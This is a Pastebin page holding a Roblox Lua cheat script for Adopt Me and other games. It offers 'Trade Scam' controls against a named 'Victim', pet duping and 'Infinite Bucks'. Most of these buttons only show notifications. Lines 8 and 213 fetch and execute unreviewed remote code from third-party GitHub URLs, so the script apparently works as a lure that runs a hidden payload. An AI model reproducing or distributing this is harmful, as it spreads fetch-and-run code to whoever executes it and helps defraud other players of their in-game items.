Advertisement
Bacon_Script

AdoptMe

Dec 30th, 2024 (edited)
123
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 7.31 KB | None | 0 0
  1. local OrionLib = loadstring(game:HttpGet(('https://raw.githubusercontent.com/shlexware/Orion/main/source')))()
  2. OrionLib:MakeNotification({
  3. Name = "Loading The Script..",
  4. Content = "May Take 20-30 seconds this is not the exact lodaing timeā—",
  5. Image = "rbxassetid://18170549235",
  6. Time = 20
  7. })
  8. loadstring(game:HttpGet("https://raw.githubusercontent.com/UnknownScripter001/AdoptMe/refs/heads/main/Universal%20Dark%20Script.txt"))()
  9. Wait (0.99)
  10. local OrionLib = loadstring(game:HttpGet(('https://raw.githubusercontent.com/shlexware/Orion/main/source')))()
  11. local Window = OrionLib:MakeWindow({Name = "šŸ¦Universal Dark Script", HidePremium = false, SaveConfig = true, ConfigFolder = "OrionTest"})
  12.  
  13. local Tab = Window:MakeTab({
  14. Name = "Adopt Me",
  15. Icon = "rbxassetid://4483345998",
  16. PremiumOnly = false
  17. })
  18.  
  19. --[[
  20. Name = <string> - The name of the tab.
  21. Icon = <string> - The icon of the tab.
  22. PremiumOnly = <bool> - Makes the tab accessible to Sirus Premium users only.
  23. ]]
  24.  
  25. local Section = Tab:AddSection({
  26. Name = "Trade Scam"
  27. })
  28.  
  29. --[[
  30. Name = <string> - The name of the section.
  31. ]]
  32.  
  33. Tab:AddTextbox({
  34. Name = "Player Name (Victim)",
  35. Default = "Roblox",
  36. TextDisappear = false,
  37. Callback = function(Value)
  38. OrionLib:MakeNotification({
  39. Name = "Player Selected!",
  40. Content = "You can now control your victim",
  41. Image = "rbxassetid://4483345998",
  42. Time = 5
  43. })
  44.  
  45. --[[
  46. Title = <string> - The title of the notification.
  47. Content = <string> - The content of the notification.
  48. Image = <string> - The icon of the notification.
  49. Time = <number> - The duration of the notfication.
  50. ]]
  51. end
  52. })
  53.  
  54. --[[
  55. Name = <string> - The name of the textbox.
  56. Default = <string> - The default value of the textbox.
  57. TextDisappear = <bool> - Makes the text disappear in the textbox after losing focus.
  58. Callback = <function> - The function of the textbox.
  59. ]]
  60.  
  61. Tab:AddButton({
  62. Name = "Make yourself freeze offer",
  63. Callback = function()
  64. OrionLib:MakeNotification({
  65. Name = "Freeze Successful!",
  66. Content = "You can now remove your pets",
  67. Image = "rbxassetid://4483345998",
  68. Time = 5
  69. })
  70.  
  71. --[[
  72. Title = <string> - The title of the notification.
  73. Content = <string> - The content of the notification.
  74. Image = <string> - The icon of the notification.
  75. Time = <number> - The duration of the notfication.
  76. ]]
  77. end
  78. })
  79.  
  80. --[[
  81. Name = <string> - The name of the button.
  82. Callback = <function> - The function of the button.
  83. ]]
  84.  
  85. Tab:AddButton({
  86. Name = "Make Victim Accept/Confirm",
  87. Callback = function()
  88. OrionLib:MakeNotification({
  89. Name = "Script Activated!",
  90. Content = "Victim Will Auto Accept And Confirm!",
  91. Image = "rbxassetid://4483345998",
  92. Time = 5
  93. })
  94.  
  95. --[[
  96. Title = <string> - The title of the notification.
  97. Content = <string> - The content of the notification.
  98. Image = <string> - The icon of the notification.
  99. Time = <number> - The duration of the notfication.
  100. ]]
  101. end
  102. })
  103.  
  104. --[[
  105. Name = <string> - The name of the button.
  106. Callback = <function> - The function of the button.
  107. ]]
  108.  
  109. local Section = Tab:AddSection({
  110. Name = "AutoFarm"
  111. })
  112.  
  113. --[[
  114. Name = <string> - The name of the section.
  115. ]]
  116.  
  117. Tab:AddToggle({
  118. Name = "Auto Farm Christmas (Event)",
  119. Default = false,
  120. Callback = function(Value)
  121. print(Value)
  122. end
  123. })
  124.  
  125. --[[
  126. Name = <string> - The name of the toggle.
  127. Default = <bool> - The default value of the toggle.
  128. Callback = <function> - The function of the toggle.
  129. ]]
  130.  
  131. Tab:AddToggle({
  132. Name = "Auto Farm Bucks",
  133. Default = false,
  134. Callback = function(Value)
  135. print(Value)
  136. end
  137. })
  138.  
  139. --[[
  140. Name = <string> - The name of the toggle.
  141. Default = <bool> - The default value of the toggle.
  142. Callback = <function> - The function of the toggle.
  143. ]]
  144.  
  145. local Section = Tab:AddSection({
  146. Name = "Dupe"
  147. })
  148.  
  149. --[[
  150. Name = <string> - The name of the section.
  151. ]]
  152.  
  153. Tab:AddButton({
  154. Name = "Equip a pet you want to dupe",
  155. Callback = function()
  156. OrionLib:MakeNotification({
  157. Name = "Pet Selected!",
  158. Content = "You can now dupe your pets",
  159. Image = "rbxassetid://4483345998",
  160. Time = 5
  161. })
  162.  
  163. --[[
  164. Title = <string> - The title of the notification.
  165. Content = <string> - The content of the notification.
  166. Image = <string> - The icon of the notification.
  167. Time = <number> - The duration of the notfication.
  168. ]]
  169. end
  170. })
  171.  
  172. --[[
  173. Name = <string> - The name of the button.
  174. Callback = <function> - The function of the button.
  175. ]]
  176.  
  177. Tab:AddButton({
  178. Name = "Click to dupe selected pets",
  179. Callback = function()
  180. OrionLib:MakeNotification({
  181. Name = "Dupe Processing…..",
  182. Content = "Kindly wait for 120 second to dupe, you will automatic get kick and it is sign your duping successful ",
  183. Image = "rbxassetid://4483345998",
  184. Time = 120
  185. })
  186.  
  187. --[[
  188. Title = <string> - The title of the notification.
  189. Content = <string> - The content of the notification.
  190. Image = <string> - The icon of the notification.
  191. Time = <number> - The duration of the notfication.
  192. ]]
  193. end
  194. })
  195.  
  196. --[[
  197. Name = <string> - The name of the button.
  198. Callback = <function> - The function of the button.
  199. ]]
  200.  
  201.  
  202. local Section = Tab:AddSection({
  203. Name = "Visual"
  204. })
  205.  
  206. --[[
  207. Name = <string> - The name of the section.
  208. ]]
  209.  
  210. Tab:AddButton({
  211. Name = "Make all pets MFR",
  212. Callback = function()
  213. loadstring(game:HttpGet("https://raw.githubusercontent.com/lf4d7/daphie/main/ame.lua"))()
  214. end
  215. })
  216.  
  217. --[[
  218. Name = <string> - The name of the button.
  219. Callback = <function> - The function of the button.
  220. ]]
  221.  
  222. Tab:AddButton({
  223. Name = "Infinite Bucks",
  224. Callback = function()
  225. require(game:service'ReplicatedStorage'.Fsys).load("ClientData").update("money",(15999999984/16))
  226. end
  227. })
  228.  
  229. local Tab = Window:MakeTab({
  230. Name = "Pet Simulator X",
  231. Icon = "rbxassetid://4483345998",
  232. PremiumOnly = false
  233. })
  234.  
  235. --[[
  236. Name = <string> - The name of the tab.
  237. Icon = <string> - The icon of the tab.
  238. PremiumOnly = <bool> - Makes the tab accessible to Sirus Premium users only.
  239. ]]
  240.  
  241. local Tab = Window:MakeTab({
  242. Name = "Pet Simulator 99",
  243. Icon = "rbxassetid://4483345998",
  244. PremiumOnly = false
  245. })
  246.  
  247. --[[
  248. Name = <string> - The name of the tab.
  249. Icon = <string> - The icon of the tab.
  250. PremiumOnly = <bool> - Makes the tab accessible to Sirus Premium users only.
  251. ]]
  252.  
  253. local Tab = Window:MakeTab({
  254. Name = "Pet Go",
  255. Icon = "rbxassetid://4483345998",
  256. PremiumOnly = false
  257. })
  258.  
  259. --[[
  260. Name = <string> - The name of the tab.
  261. Icon = <string> - The icon of the tab.
  262. PremiumOnly = <bool> - Makes the tab accessible to Sirus Premium users only.
  263. ]]
  264.  
  265. local Tab = Window:MakeTab({
  266. Name = "Blade Ball",
  267. Icon = "rbxassetid://4483345998",
  268. PremiumOnly = false
  269. })
  270.  
  271. --[[
  272. Name = <string> - The name of the tab.
  273. Icon = <string> - The icon of the tab.
  274. PremiumOnly = <bool> - Makes the tab accessible to Sirus Premium users only.
  275. ]]
  276.  
  277. local Tab = Window:MakeTab({
  278. Name = "Da Hood",
  279. Icon = "rbxassetid://4483345998",
  280. PremiumOnly = false
  281. })
  282.  
  283. --[[
  284. Name = <string> - The name of the tab.
  285. Icon = <string> - The icon of the tab.
  286. PremiumOnly = <bool> - Makes the tab accessible to Sirus Premium users only.
  287. ]]
  288.  
  289. local Tab = Window:MakeTab({
  290. Name = "Murder Mystery 2",
  291. Icon = "rbxassetid://4483345998",
  292. PremiumOnly = false
  293. })
  294.  
  295. --[[
  296. Name = <string> - The name of the tab.
  297. Icon = <string> - The icon of the tab.
  298. PremiumOnly = <bool> - Makes the tab accessible to Sirus Premium users only.
  299. ]]
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement